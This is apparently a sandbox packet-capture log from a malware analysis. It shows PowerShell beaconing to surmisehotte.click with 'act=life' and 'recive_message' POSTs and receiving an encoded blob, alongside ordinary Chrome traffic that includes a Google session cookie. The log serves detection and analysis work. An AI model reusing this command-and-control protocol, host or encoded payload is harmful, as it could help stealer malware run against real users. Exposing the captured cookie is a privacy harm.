2024-12-21 20:06:21 UTC	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: surmisehotte.click
2024-12-21 20:06:21 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-12-21 20:06:22 UTC	1135	IN	HTTP/1.1 200 OK Date: Sat, 21 Dec 2024 20:06:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=va3ssoim07qhm9phne3nth824u; expires=Wed, 16 Apr 2025 13:53:00 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NHfB%2FPttGYeNd8L9itW%2FSb%2FK2N3roE8zu8byf6eVFNBnosofF96%2B40l9gVOGy%2FAjjFqucrQf0fAqkinsr4GKpVKEWdnnPmfV0I4IOev2Ir4MXMafTBikBXfGmyYChcysQkO5yUc%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f5a7e006b69a570-MIA alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=130062&min_rtt=129987&rtt_var=27540&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2845&recv_bytes=909&delivery_rate=29405&cwnd=252&unsent_bytes=0&cid=e6b4d1cd3ba5c817&ts=980&x=0"
2024-12-21 20:06:22 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-12-21 20:06:22 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.11.20	49757	104.21.96.1	443	9160	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-21 20:06:23 UTC	266	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 48 Host: surmisehotte.click
2024-12-21 20:06:23 UTC	48	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 79 4a 45 63 61 47 2d 2d 73 69 6e 67 6c 36 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=yJEcaG--singl6&j=
2024-12-21 20:06:24 UTC	1139	IN	HTTP/1.1 200 OK Date: Sat, 21 Dec 2024 20:06:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=t86e3j6l4rsr7ku4729f7unhog; expires=Wed, 16 Apr 2025 13:53:03 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=U%2BI3ebE7JWZQulyTeyjG5AdrE%2FhhOi8lCsAHuUTckREN%2BIWKaFaY1x6HyGEmOmqDeetVywcJ7EX5zGBmMzNUW0YbTFE%2FUQUQsHC8v%2Fr3%2FpIuswMg4iNlDK2v02V%2B7tzOJPSXmn8%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f5a7e0e8a6821fd-MIA alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=129309&min_rtt=129214&rtt_var=27412&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2844&recv_bytes=950&delivery_rate=29557&cwnd=252&unsent_bytes=0&cid=e4477dbdef6c1dd6&ts=709&x=0"
2024-12-21 20:06:24 UTC	230	IN	Data Raw: 34 39 31 63 0d 0a 64 70 74 75 73 72 36 6b 6c 50 45 4a 57 75 6c 31 35 56 6c 74 44 47 32 59 66 79 57 2f 53 38 47 54 43 6d 6b 6f 57 44 6b 2f 62 59 38 4e 75 52 69 51 68 4a 43 34 30 33 6f 2f 79 30 2b 52 4b 78 68 70 51 62 6f 65 51 5a 31 78 70 2f 4a 6d 47 6b 31 30 47 30 6b 41 72 55 7a 39 44 39 37 4e 77 62 6a 54 62 43 4c 4c 54 37 34 69 54 32 6b 44 75 6b 55 48 32 69 47 6a 38 6d 59 4c 53 54 4e 57 54 77 48 73 48 76 63 4a 32 74 76 48 38 4a 42 6c 4e 34 77 51 67 44 67 48 59 67 54 31 46 30 69 64 5a 2b 50 32 63 45 73 53 65 6e 52 61 47 65 34 37 2b 68 33 5a 6e 4e 6d 34 69 69 73 2f 68 31 66 66 65 77 78 70 44 2f 51 5a 51 64 51 6a 71 66 74 75 43 6b 77 79 53 56 59 4c 35 78 37 35 43 74 76 52 7a 75 53 64 Data Ascii: 491cdptusr6klPEJWul15VltDG2YfyW/S8GTCmkoWDk/bY8NuRiQhJC403o/y0+RKxhpQboeQZ1xp/JmGk10G0kArUz9D97NwbjTbCLLT74iT2kDukUH2iGj8mYLSTNWTwHsHvcJ2tvH8JBlN4wQgDgHYgT1F0idZ+P2cEsSenRaGe47+h3ZnNm4iis/h1ffewxpD/QZQdQjqftuCkwySVYL5x75CtvRzuSd
2024-12-21 20:06:24 UTC	1369	IN	Data Raw: 62 7a 43 48 46 6f 6f 34 54 79 42 50 2f 51 55 48 68 57 6e 77 77 32 73 61 57 79 39 57 54 51 6d 74 43 37 63 56 6b 4e 76 4b 74 73 73 72 4d 49 63 5a 67 6a 67 41 61 51 37 36 44 30 6a 64 4b 71 76 35 62 41 46 46 4e 56 52 54 42 65 6f 63 38 41 76 66 32 38 37 77 6e 47 68 34 78 56 65 41 49 30 38 32 54 39 6f 4e 52 4e 34 39 72 75 41 6f 46 41 51 6a 47 31 6f 44 72 55 79 35 43 74 37 64 79 2f 61 42 59 7a 4f 41 45 70 55 77 42 6d 4d 43 2b 68 42 4e 30 69 71 6a 39 6d 49 42 52 54 42 66 55 41 4c 72 46 50 6c 4d 6e 70 7a 42 37 74 4d 7a 65 4b 67 53 6c 7a 77 44 65 45 33 41 58 56 69 54 4d 4f 50 32 5a 45 73 53 65 6c 4e 59 44 4f 34 66 39 67 2f 59 31 39 54 32 67 57 30 31 6a 67 57 42 50 67 46 6b 44 4f 67 58 53 64 73 71 71 76 70 68 44 6b 30 2b 47 78 4e 50 36 67 79 35 56 4a 44 39 79 2f 32 Data Ascii: bzCHFoo4TyBP/QUHhWnww2saWy9WTQmtC7cVkNvKtssrMIcZgjgAaQ76D0jdKqv5bAFFNVRTBeoc8Avf287wnGh4xVeAI082T9oNRN49ruAoFAQjG1oDrUy5Ct7dy/aBYzOAEpUwBmMC+hBN0iqj9mIBRTBfUALrFPlMnpzB7tMzeKgSlzwDeE3AXViTMOP2ZEsSelNYDO4f9g/Y19T2gW01jgWBPgFkDOgXSdsqqvphDk0+GxNP6gy5VJD9y/2
2024-12-21 20:06:24 UTC	1369	IN	Data Raw: 78 61 4e 4b 52 31 75 41 2b 67 52 54 64 73 6d 72 76 30 6f 52 51 6f 39 51 78 31 58 72 54 37 36 47 4e 50 57 68 4d 4f 51 5a 54 61 4d 41 63 63 6b 51 58 64 50 2f 52 45 48 68 57 6d 75 38 47 41 4e 57 44 56 57 58 67 48 6a 47 2f 77 44 32 4e 7a 47 2b 35 5a 76 4d 34 41 55 69 6a 38 64 5a 41 2f 79 47 45 62 58 49 2b 4f 2f 4b 41 78 53 65 67 4d 64 50 76 6f 66 75 7a 6e 54 30 73 6a 78 68 53 73 6e 78 51 37 48 50 41 4d 75 56 37 6f 51 54 39 67 73 72 50 42 69 42 55 38 77 56 31 55 42 37 67 62 32 43 4e 44 51 7a 76 79 65 5a 54 79 44 48 6f 77 77 43 57 34 4f 38 46 30 4a 6e 53 36 37 73 54 42 4c 66 6a 31 58 55 41 43 76 49 66 6f 43 33 74 76 51 74 6f 77 6c 49 63 73 51 69 33 74 58 4c 67 50 7a 48 55 7a 58 4c 61 50 32 5a 51 35 4a 50 56 68 51 43 4f 63 61 2f 67 6a 63 31 63 76 77 6b 32 77 38 Data Ascii: xaNKR1uA+gRTdsmrv0oRQo9Qx1XrT76GNPWhMOQZTaMAcckQXdP/REHhWmu8GANWDVWXgHjG/wD2NzG+5ZvM4AUij8dZA/yGEbXI+O/KAxSegMdPvofuznT0sjxhSsnxQ7HPAMuV7oQT9gsrPBiBU8wV1UB7gb2CNDQzvyeZTyDHowwCW4O8F0JnS67sTBLfj1XUACvIfoC3tvQtowlIcsQi3tXLgPzHUzXLaP2ZQ5JPVhQCOca/gjc1cvwk2w8
2024-12-21 20:06:24 UTC	1369	IN	Data Raw: 74 58 4c 67 54 50 45 31 47 64 4e 75 33 6f 4b 41 78 47 65 67 4d 64 42 75 51 47 39 77 4c 5a 30 63 44 2b 6c 47 55 31 67 42 47 4d 50 41 68 6f 41 76 49 51 51 74 34 6f 70 2f 74 36 43 45 45 77 56 6c 64 50 6f 31 54 2b 46 4a 43 45 68 74 47 66 51 69 69 51 42 5a 46 37 45 43 41 57 75 68 70 4c 6e 58 48 6a 38 6d 63 43 52 54 4a 54 55 67 44 70 47 76 38 4b 33 64 6e 4a 2f 49 46 6a 4e 6f 59 63 69 44 41 64 62 67 4c 2b 45 55 50 56 49 71 6d 78 4a 6b 74 4e 49 68 73 46 54 39 67 5a 39 67 7a 54 79 6f 62 70 33 58 4a 34 6a 42 76 48 59 30 39 69 41 66 6f 53 53 39 45 69 71 2f 42 6b 42 55 30 2f 55 6c 55 48 2f 78 58 39 42 4e 48 53 79 66 65 58 62 6a 32 50 45 49 4d 39 41 43 35 42 75 68 70 66 6e 58 48 6a 33 6b 38 2b 43 42 74 68 48 52 43 6a 44 62 6b 4c 33 4a 79 65 74 70 39 6f 4e 49 4d 59 67 Data Ascii: tXLgTPE1GdNu3oKAxGegMdBuQG9wLZ0cD+lGU1gBGMPAhoAvIQQt4op/t6CEEwVldPo1T+FJCEhtGfQiiQBZF7ECAWuhpLnXHj8mcCRTJTUgDpGv8K3dnJ/IFjNoYciDAdbgL+EUPVIqmxJktNIhsFT9gZ9gzTyobp3XJ4jBvHY09iAfoSS9Eiq/BkBU0/UlUH/xX9BNHSyfeXbj2PEIM9AC5BuhpfnXHj3k8+CBthHRCjDbkL3Jyetp9oNIMYg
2024-12-21 20:06:24 UTC	1369	IN	Data Raw: 50 6f 6c 31 4e 31 69 32 67 39 57 30 45 53 7a 74 64 54 77 6a 6b 42 76 63 42 33 39 54 4f 2f 35 4a 76 50 59 59 52 69 7a 45 4f 61 51 48 30 46 51 65 54 61 61 54 70 4b 46 4d 4b 47 30 74 47 48 66 73 5a 32 41 48 66 6e 4e 6d 34 69 69 73 2f 68 31 66 66 65 77 5a 38 43 2f 63 50 54 74 6f 6e 72 50 4a 36 43 6b 63 78 53 56 6f 41 36 52 50 31 43 74 2f 61 78 2f 4f 5a 5a 7a 2b 4f 48 49 67 33 54 79 42 50 2f 51 55 48 68 57 6d 4e 2b 6e 73 63 53 54 52 51 53 78 53 74 43 37 63 56 6b 4e 76 4b 74 73 73 72 4f 34 41 63 67 7a 73 44 62 67 76 33 48 56 58 53 4c 71 54 34 59 78 6c 41 50 56 78 57 42 2b 59 62 2f 78 37 63 30 74 54 7a 67 58 6c 34 78 56 65 41 49 30 38 32 54 38 77 61 56 38 30 71 34 63 42 2b 43 46 77 78 56 6c 46 50 38 6c 72 67 54 4e 66 51 68 71 37 54 62 54 65 43 46 49 67 36 42 6d Data Ascii: Pol1N1i2g9W0ESztdTwjkBvcB39TO/5JvPYYRizEOaQH0FQeTaaTpKFMKG0tGHfsZ2AHfnNm4iis/h1ffewZ8C/cPTtonrPJ6CkcxSVoA6RP1Ct/ax/OZZz+OHIg3TyBP/QUHhWmN+nscSTRQSxStC7cVkNvKtssrO4AcgzsDbgv3HVXSLqT4YxlAPVxWB+Yb/x7c0tTzgXl4xVeAI082T8waV80q4cB+CFwxVlFP8lrgTNfQhq7TbTeCFIg6Bm
2024-12-21 20:06:24 UTC	1369	IN	Data Raw: 42 34 56 70 6d 2f 70 6d 4f 55 6b 68 47 30 4a 42 39 46 54 2b 41 4a 43 45 68 76 57 55 61 44 6d 42 48 6f 73 30 43 47 6f 64 38 42 70 56 33 43 69 6f 2f 47 51 4c 52 7a 64 52 58 41 62 67 47 50 51 4c 31 39 50 44 74 74 30 72 50 35 4e 58 33 33 73 75 59 77 54 32 52 68 32 64 4e 75 33 6f 4b 41 78 47 65 67 4d 64 44 2b 63 52 38 77 48 54 30 38 58 6b 6b 6d 30 71 69 78 71 4e 4b 51 56 6c 43 76 63 51 53 74 34 76 70 66 70 6b 47 55 4d 36 57 46 5a 50 6f 31 54 2b 46 4a 43 45 68 74 57 45 66 54 4b 4d 47 35 45 77 44 6d 30 5a 39 77 30 48 6b 32 6d 79 39 6e 6c 4c 45 69 78 4c 53 67 6a 79 57 75 42 4d 31 39 43 47 72 74 4e 74 4d 59 30 51 67 54 55 64 61 77 6e 31 45 6b 37 55 4c 61 76 79 61 41 39 4f 50 56 35 65 41 2b 59 54 2b 67 50 55 31 63 6a 2f 6e 43 74 32 79 78 43 66 65 31 63 75 4c 75 45 Data Ascii: B4Vpm/pmOUkhG0JB9FT+AJCEhvWUaDmBHos0CGod8BpV3Cio/GQLRzdRXAbgGPQL19PDtt0rP5NX33suYwT2Rh2dNu3oKAxGegMdD+cR8wHT08Xkkm0qixqNKQVlCvcQSt4vpfpkGUM6WFZPo1T+FJCEhtWEfTKMG5EwDm0Z9w0Hk2my9nlLEixLSgjyWuBM19CGrtNtMY0QgTUdawn1Ek7ULavyaA9OPV5eA+YT+gPU1cj/nCt2yxCfe1cuLuE
2024-12-21 20:06:24 UTC	1369	IN	Data Raw: 4b 4c 6a 61 77 49 4b 64 42 74 61 46 36 31 4d 75 53 7a 62 79 73 50 78 68 53 6b 4e 69 42 6d 4a 50 42 6b 75 45 4d 56 54 42 39 49 7a 34 36 6c 52 45 67 6f 39 56 78 31 58 72 51 48 2b 44 4e 66 47 30 50 47 66 65 6a 4f 47 47 36 55 30 43 48 67 4d 39 52 35 57 31 47 57 6f 2f 43 68 46 43 6a 31 44 48 56 65 74 4f 2f 34 61 30 2f 50 46 35 35 6f 72 64 73 73 51 6b 58 74 58 4c 6a 47 36 44 30 54 4e 4b 71 7a 67 56 6b 73 53 49 32 55 64 42 50 73 54 36 51 2f 47 31 38 76 36 67 6c 56 34 30 30 50 56 61 56 30 38 58 65 56 64 57 4f 4a 6e 34 2f 41 6f 55 33 4d 6a 47 30 74 50 74 55 61 33 54 4d 4b 63 6e 72 62 55 61 43 71 5a 45 59 51 74 44 43 6b 78 78 44 70 52 31 79 36 7a 39 6e 38 45 43 6e 51 62 55 6b 2b 31 4c 62 6b 46 31 38 66 58 34 4a 35 37 50 38 73 6f 79 58 73 58 4c 6c 65 36 4b 45 54 54 Data Ascii: KLjawIKdBtaF61MuSzbysPxhSkNiBmJPBkuEMVTB9Iz46lREgo9Vx1XrQH+DNfG0PGfejOGG6U0CHgM9R5W1GWo/ChFCj1DHVetO/4a0/PF55ordssQkXtXLjG6D0TNKqzgVksSI2UdBPsT6Q/G18v6glV400PVaV08XeVdWOJn4/AoU3MjG0tPtUa3TMKcnrbUaCqZEYQtDCkxxDpR1y6z9n8ECnQbUk+1LbkF18fX4J57P8soyXsXLle6KETT
2024-12-21 20:06:24 UTC	1369	IN	Data Raw: 6f 5a 54 44 6c 4e 58 6b 6a 54 4b 76 67 42 33 35 44 49 2f 5a 4e 73 4b 4a 30 4d 79 7a 4d 4d 64 42 58 45 49 32 7a 52 4c 36 54 72 62 77 31 73 47 68 73 54 54 2b 4a 55 6f 54 57 51 6c 49 62 4a 33 53 73 67 79 30 2f 48 44 67 78 67 41 66 30 4c 56 70 41 42 67 4d 74 53 53 57 59 39 54 68 38 37 36 67 54 6f 42 39 33 51 68 72 6a 54 62 58 6a 54 52 38 6c 37 43 33 39 50 6f 6b 30 56 68 6e 7a 77 70 6a 68 5a 56 58 52 43 48 52 6d 74 54 4b 74 43 6b 4d 36 47 72 74 4d 73 4f 35 6b 46 67 54 67 5a 62 55 6a 45 49 32 44 54 4c 71 4c 6e 65 42 78 46 42 47 56 49 44 4f 4d 61 2f 68 72 42 6e 49 69 32 6e 43 74 67 73 6c 66 50 65 7a 41 67 54 2b 4a 64 48 35 30 63 6f 50 39 6d 44 46 77 72 46 6e 6f 42 36 68 58 76 48 4d 66 54 68 72 6a 54 62 58 6a 54 52 63 6c 37 43 33 39 50 6f 6b 30 56 68 6e 7a 77 70 Data Ascii: oZTDlNXkjTKvgB35DI/ZNsKJ0MyzMMdBXEI2zRL6Trbw1sGhsTT+JUoTWQlIbJ3Ssgy0/HDgxgAf0LVpABgMtSSWY9Th876gToB93QhrjTbXjTR8l7C39Pok0VhnzwpjhZVXRCHRmtTKtCkM6GrtMsO5kFgTgZbUjEI2DTLqLneBxFBGVIDOMa/hrBnIi2nCtgslfPezAgT+JdH50coP9mDFwrFnoB6hXvHMfThrjTbXjTRcl7C39Pok0Vhnzwp
2024-12-21 20:06:24 UTC	1369	IN	Data Raw: 33 58 6c 4d 49 72 7a 58 7a 48 4e 33 54 77 62 53 7a 62 43 36 49 56 38 6c 37 41 79 35 58 75 68 78 4e 7a 53 53 73 39 69 51 4d 55 44 30 62 45 30 2f 6a 56 4b 46 4d 30 64 62 57 2b 35 78 73 64 49 30 5a 69 58 73 51 49 42 61 36 43 77 65 46 65 75 32 78 65 6b 73 53 65 68 78 65 48 66 38 53 2b 68 72 54 6d 2f 6a 49 76 6e 6b 2f 6d 78 54 46 43 67 4a 71 47 65 38 65 56 39 6f 58 6e 64 78 36 44 46 6f 35 47 57 77 5a 37 68 54 33 43 35 43 53 68 75 37 54 4d 33 69 6d 42 59 41 72 44 43 35 42 75 68 45 48 68 57 6d 75 34 32 38 62 53 58 5a 63 52 77 69 74 43 37 63 56 6b 4d 71 47 72 73 41 6c 65 4a 6c 58 33 33 74 49 59 41 4c 37 48 6b 6e 65 4f 37 48 33 61 78 31 4a 66 57 56 6a 49 76 38 54 36 51 2b 53 37 63 76 79 68 58 34 37 6d 78 43 35 42 53 4a 38 43 4f 6f 65 42 66 45 75 72 76 31 57 4e 58 Data Ascii: 3XlMIrzXzHN3TwbSzbC6IV8l7Ay5XuhxNzSSs9iQMUD0bE0/jVKFM0dbW+5xsdI0ZiXsQIBa6CweFeu2xeksSehxeHf8S+hrTm/jIvnk/mxTFCgJqGe8eV9oXndx6DFo5GWwZ7hT3C5CShu7TM3imBYArDC5BuhEHhWmu428bSXZcRwitC7cVkMqGrsAleJlX33tIYAL7HkneO7H3ax1JfWVjIv8T6Q+S7cvyhX47mxC5BSJ8COoeBfEurv1WNX

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.11.20	49761	172.217.15.196	443	8052	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-21 20:06:27 UTC	807	OUT	GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1 Host: www.google.com Connection: keep-alive X-Client-Data: CI+2yQEIorbJAQipncoBCMD2ygEIk6HLAQic/swBCIWgzQEIrJ7OAQjkr84BCMO2zgEIvbnOAQjtvM4BCLu9zgEI1r3OAQjMv84BGMHLzAEYva7OARidsc4B Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9 Cookie: NID=517=i4E8sm-BN75bnGkPw4VW8uy51aQ8ounjntfNX2fu8MFJNuIvCX0dRBy-XkHqHwKOVFSSaC2nqfULsnHhY3TzIXHWC90jS3Wi2BINtQIDr1LJvZE4Ud-byTNL9Q04Nd1-ydmJvrWYY5vORspW6soJ1bMj20dq8UvPjgkw2sOvmuTUanqu
2024-12-21 20:06:28 UTC	1266	IN	HTTP/1.1 200 OK Date: Sat, 21 Dec 2024 20:06:28 GMT Pragma: no-cache Expires: -1 Cache-Control: no-cache, must-revalidate Content-Type: text/javascript; charset=UTF-8 Strict-Transport-Security: max-age=31536000 Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-J5MPqf-HGkEJ-jf0KumSRQ' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]} Accept-CH: Sec-CH-Prefers-Color-Scheme Accept-CH: Sec-CH-UA-Form-Factors Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Content-Disposition: attachment; filename="f.txt" Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-12-21 20:06:28 UTC	1266	IN	Data Raw: 35 31 35 0d 0a 29 5d 7d 27 0a 5b 22 22 2c 5b 22 74 66 32 20 63 6f 6d 69 63 73 22 2c 22 6f 6e 65 20 70 69 65 63 65 20 63 68 61 70 74 65 72 20 31 31 33 34 20 73 70 6f 69 6c 65 72 73 20 72 65 64 64 69 74 22 2c 22 77 6f 6d 65 6e 20 76 6f 6c 6c 65 79 62 61 6c 6c 20 63 68 61 6d 70 69 6f 6e 73 68 69 70 22 2c 22 77 6f 6d 65 6e 20 76 6f 6c 6c 65 79 62 61 6c 6c 20 63 68 61 6d 70 69 6f 6e 73 68 69 70 22 2c 22 64 6f 77 20 6a 6f 6e 65 73 20 73 74 6f 63 6b 20 6d 61 72 6b 65 74 73 22 2c 22 64 61 6c 6c 61 73 20 6d 61 76 65 72 69 63 6b 73 22 2c 22 67 6f 6f 67 6c 65 20 70 69 78 65 6c 20 39 20 70 72 6f 22 2c 22 6e 75 6e 61 20 62 61 62 79 20 65 73 73 65 6e 74 69 61 6c 73 20 63 61 72 20 73 65 61 74 20 72 65 63 61 6c 6c 22 5d 2c 5b 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c Data Ascii: 515)]}'["",["tf2 comics","one piece chapter 1134 spoilers reddit","women volleyball championship","women volleyball championship","dow jones stock markets","dallas mavericks","google pixel 9 pro","nuna baby essentials car seat recall"],["","","","","",
2024-12-21 20:06:28 UTC	42	IN	Data Raw: 6c 72 63 47 74 31 64 6a 4e 4d 55 6d 46 4b 53 54 56 45 63 46 4a 4e 61 31 4e 45 52 79 73 77 5a 58 42 78 59 32 56 47 54 46 0d 0a Data Ascii: lrcGt1djNMUmFKSTVEcFJNa1NERyswZXBxY2VGTF
2024-12-21 20:06:28 UTC	1255	IN	Data Raw: 32 30 33 36 0d 0a 6c 79 53 32 70 70 52 30 70 52 57 6a 68 51 55 45 64 56 52 57 64 42 61 30 4e 4f 54 6d 68 30 62 30 6b 77 63 46 4e 6e 4d 32 35 6f 65 54 4a 4d 55 32 31 34 5a 44 4e 35 59 33 6c 46 53 6b 74 72 64 69 74 4d 64 32 74 74 57 6d 6c 61 54 57 74 49 64 6c 64 7a 59 30 31 4e 53 6c 64 57 64 44 52 6f 61 55 74 44 59 33 64 46 55 45 4e 42 52 44 42 6e 61 6a 4d 7a 63 46 4e 6e 65 6d 4d 30 59 31 70 6a 55 32 74 48 4b 33 5a 34 51 31 46 74 56 58 5a 42 53 46 46 42 5a 48 5a 4d 59 6c 6c 54 55 30 46 45 56 33 52 49 51 7a 46 7a 53 45 4e 30 5a 43 39 70 56 47 6c 30 53 58 70 59 53 6b 64 58 53 6a 46 46 51 57 52 36 4b 79 39 4a 55 58 42 52 52 54 68 4d 56 33 64 59 62 53 74 32 65 45 68 56 65 6b 68 51 52 57 4a 46 59 55 4e 4f 54 69 74 72 5a 45 38 78 5a 44 4a 46 4e 46 4e 36 61 47 46 Data Ascii: 2036lyS2ppR0pRWjhQUEdVRWdBa0NOTmh0b0kwcFNnM25oeTJMU214ZDN5Y3lFSktrditMd2ttWmlaTWtIdldzY01NSldWdDRoaUtDY3dFUENBRDBnajMzcFNnemM0Y1pjU2tHK3Z4Q1FtVXZBSFFBZHZMYllTU0FEV3RIQzFzSEN0ZC9pVGl0SXpYSkdXSjFFQWR6Ky9JUXBRRThMV3dYbSt2eEhVekhQRWJFYUNOTitrZE8xZDJFNFN6aGF
2024-12-21 20:06:28 UTC	1255	IN	Data Raw: 70 69 63 45 78 36 57 44 4a 55 52 53 38 76 4d 57 52 59 4e 31 6c 48 54 44 42 42 51 57 68 4f 65 6b 49 35 62 6b 46 42 51 55 59 35 56 57 78 46 55 56 5a 53 53 57 6c 61 4d 6c 63 76 56 30 39 6a 64 47 68 75 53 45 70 52 53 55 68 61 4e 32 70 5a 55 55 56 44 53 47 68 46 51 56 6c 70 57 58 4e 6a 62 6a 52 46 4e 30 38 7a 59 57 4e 79 61 7a 49 33 5a 47 39 72 57 46 6f 76 56 31 64 4f 64 54 41 31 64 47 4a 6b 4e 56 63 33 5a 48 55 72 4c 7a 6b 76 4d 33 4e 51 62 44 64 4f 62 6d 52 5a 62 48 67 76 4e 33 64 59 65 44 5a 49 61 79 74 44 55 46 52 76 52 56 46 6f 4f 56 52 4b 4f 44 68 31 63 56 70 51 55 48 56 79 4d 6d 4e 6d 4d 58 46 42 4e 31 46 47 4e 6d 38 32 5a 6a 4e 6e 55 48 64 4c 57 56 49 76 4f 58 56 4d 53 6d 74 34 5a 57 5a 69 5a 44 42 59 63 31 42 59 4e 54 6c 31 59 6a 59 72 64 57 49 79 4e Data Ascii: picEx6WDJURS8vMWRYN1lHTDBBQWhOekI5bkFBQUY5VWxFUVZSSWlaMlcvV09jdGhuSEpRSUhaN2pZUUVDSGhFQVlpWXNjbjRFN08zYWNyazI3ZG9rWFovV1dOdTA1dGJkNVc3ZHUrLzkvM3NQbDdObmRZbHgvN3dYeDZIaytDUFRvRVFoOVRKODh1cVpQUHVyMmNmMXFBN1FGNm82ZjNnUHdLWVIvOXVMSmt4ZWZiZDBYc1BYNTl1YjYrdWIyN
2024-12-21 20:06:28 UTC	1255	IN	Data Raw: 6e 45 72 64 33 4a 6a 5a 6c 56 75 59 6b 31 4c 56 30 64 55 59 56 5a 4f 4d 44 64 70 5a 32 4e 56 56 46 52 6b 63 55 4e 4e 56 30 64 4c 53 48 6c 70 61 44 46 5a 62 56 64 76 54 6e 46 59 53 30 68 6a 65 44 68 4b 55 6b 46 70 64 56 42 4c 54 6e 46 4e 63 31 42 48 4d 47 74 36 65 48 64 4c 62 55 56 70 52 31 70 76 4e 33 6c 69 59 32 64 6b 55 6b 74 44 52 6b 31 76 59 58 64 7a 54 58 70 6f 64 6c 56 55 56 56 4a 4c 55 6e 64 52 65 57 39 30 57 6d 31 4c 65 46 4e 34 4f 46 64 44 56 44 42 35 57 55 39 61 55 54 52 35 53 56 46 6d 64 30 5a 43 55 32 78 6e 63 46 4a 68 54 6b 64 35 63 6b 5a 49 52 6e 46 77 65 6c 70 48 61 54 5a 70 5a 33 64 55 52 6e 6c 43 59 56 52 34 64 79 74 58 4d 53 73 78 63 57 74 43 5a 57 68 4b 53 56 46 72 65 54 56 49 61 31 64 70 55 6b 56 76 53 58 64 6f 61 56 4e 77 64 55 70 75 Data Ascii: nErd3JjZlVuYk1LV0dUYVZOMDdpZ2NVVFRkcUNNV0dLSHlpaDFZbVdvTnFYS0hjeDhKUkFpdVBLTnFNc1BHMGt6eHdLbUVpR1pvN3liY2dkUktDRk1vYXdzTXpodlVUVVJLUndReW90Wm1LeFN4OFdDVDB5WU9aUTR5SVFmd0ZCU2xncFJhTkd5ckZIRnFwelpHaTZpZ3dURnlCYVR4dytXMSsxcWtCZWhKSVFreTVIa1dpUkVvSXdoaVNwdUpu
